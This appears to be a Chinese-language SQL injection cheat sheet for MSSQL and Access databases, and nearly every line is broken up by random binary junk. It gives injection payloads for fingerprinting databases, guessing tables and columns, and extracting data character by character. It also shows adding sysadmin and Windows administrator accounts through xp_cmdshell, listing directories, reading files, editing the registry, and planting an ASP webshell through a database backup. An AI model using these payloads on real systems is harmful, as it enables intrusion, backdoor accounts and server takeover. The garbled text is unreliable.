1.判断是否有注入;and 1=1 ;and 1=2 . E?���a�
2.初步判断是否是mssql ;and user>0 /{�FS��G!�
~�xU�\%@I\
3.注入参数是字符'and [查询条件] and ''=' m`6�=6�(_p
3"p�'�WZ>�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �]=?.LMjnH
^Q5advxuq�
5.判断数据库系统 `�i{p�6-U3
!X ={a{<,T
;and (select count(*) from sysobjects)>0 mssql ���S�9lT�4
NZ:KJ8ea�"
;and (select count(*) from msysobjects)>0 access iNv"!�'�|�
�*T�C#|5��
�h$$2(!G4
H� rI�(uZ]
6.猜数据库 ;and (select Count(*) from [数据库名])>0 lCiRv�h1�K
�5"2pU{xmK
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 '-M9�v3itC
&"mWi-�Mpl
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �~R
���C\
)��bl^�:�C
9.(1)猜字段的ascii值(access) �<(W:Q�3?s
xY<���*:�&
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
�O2�N~&<^
cs0rz= ZdH
(2)猜字段的ascii值(mssql) \�<Di��|X1
p%ZAVd*|#V
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 N.dcQ�Q_iS
RL�R\*d�L1
10.测试权限结构(mssql) !T���
R�U�
y[d>�7fc�f
���KkyZ�d9
$_Q��]3�"U
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- a|k�Eza,]
�uQO�\vRh0
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- }�Wz[ox�9b
��"�`Y.5�.
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Y?x���c#'�
UIK4]cYC�'
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �iP�dR;�O'
�"V{v*Aei0
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- B�nh*�;�J0
�RKD$'UW�X
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- m��t}�3/d
�d~z%kl
5:
;and 1=(select IS_MEMBER('db_owner'));-- kadw�1s�Yj
�%z"n}|%�!
-���I�.B�Q
21 �N!?DR�
11.添加mssql和系统的帐户 �
\JBPZ~N3
�~�%QI#s?|
;exec master.dbo.sp_addlogin username;-- �O�TD<3Q
q
;exec master.dbo.sp_password null,username,password;-- #�y�*p7~|@
5m9;��'S�F
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3h�**y
%^
���KhZ\q|5
;exec master.dbo.xp_cmdshell 'net user username password YWh�p��4`m
�2}�U:6w�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ���U��X�@8
F�C#�t}4as
;exec master.dbo.xp_cmdshell 'net user username password /add';-- s��PR�o=LB
:aWC6"ik-W
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- xew s~74L�
i9�v|*Z�M"
��_l=X?/��
��Uu~~-5
12.(1)遍历目录 A O3MlK�9t
36\_Y?zx�%
;create table dirs(paths varchar(100), id int) }�T&~DV�M
�MTAq}��8�
;insert dirs exec master.dbo.xp_dirtree 'c:\' DTz)qHd#X�
8�]�&\FA�8
;and (select top 1 paths from dirs)>0 _ pO1XM���
H�g�brl�h�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 9@wmngvM*Y
�]:�svR@�E
O��7z5�,-
{9�XQ~t"m^
(2)遍历目录 �H��&uh$y@
��s�7s@!~
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- lX/���:e�=
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 w�G
X\ub#!
Bj�*�
M
W
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 � |F�e�*t
Huf;�A1��.
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 m�O&zE;/[�
n���7pj�j�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 C~���R�,�,
c�HX~-:KOr
Hle�M�zykF
�ca,U�>'(y
13.mssql中的存储过程 S3gd'Ba�hq
1;�JH0~403
xp_regenumvalues 注册表根键, 子键 jS4��fAN�G
J=Hy�o�z+9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 t(G��g
�1
n.�.R'v�Nj
xp_regread 根键,子键,键值名 !'*�1;OQ��
�{!xDJnF;�
;exec xp_regread `��gz/�?q
<`d;>r=�4z
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �?��JM�y��
�f[-$##S.~
xp_regwrite 根键,子键, 值名, 值类型, 值 2�q ~�y\fe
Zqj� �EVVB
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �/7i�gPNhx
.�svlJSx��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �[�U��_���
>��r��.W \
xp_regdeletevalue 根键,子键,值名 VF:95F;@��
0�X4I-�xx#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 \-�CL}Z}S
��h
�I�7ur
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ?x�w0kXK4�
v)<|@TD�)�
�tf6� Z�z[
y=�LN|�vkQ
14.mssql的backup创建webshell B~2M�/&rM\
'Xu3]�'�m*
use model j.�+�}Z �|
S�^A+Km3VB
create table cmd(str image); 0ni/!�}YP_
p{[(4}q�l�
insert into cmd(str) values (''); -YY@[�5x?u
j> dL:V�&`
backup database model to disk='c:\l.asp'; � ��0X�}0,
sF~!qag4q'
qv3% v3\�4
#7=- zda5
15.mssql内置函数 gbz�iEj�Re
> *soc!#�Y
;and (select @@version)>0 获得Windows的版本号 [Nu �py�,v
nJ�Y3 1(�p
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �|f2���bb�
a([8r- �zP
;and (select user_name())>0 爆当前系统的连接用户 U\i7�'9w]3
?<1~KLPMhY
;and (select db_name())>0 得到当前连接的数据库 lH/�7m;M��
|jb,sd[=S�
["�sm�7y�Q
Cv��RO'��
16.简洁的webshell Q-Oj%w��4e
[wn!
�<#~v
use model hkx�(�r�5o
a���V�#phP
create table cmd(str image); Q:8t1Z�D�o
<K��Fl4A�~
insert into cmd(str) values (''); �2*a5pFk�b
�,PeE'$q��
backup database model to disk='g:\wwwtest\l.asp';
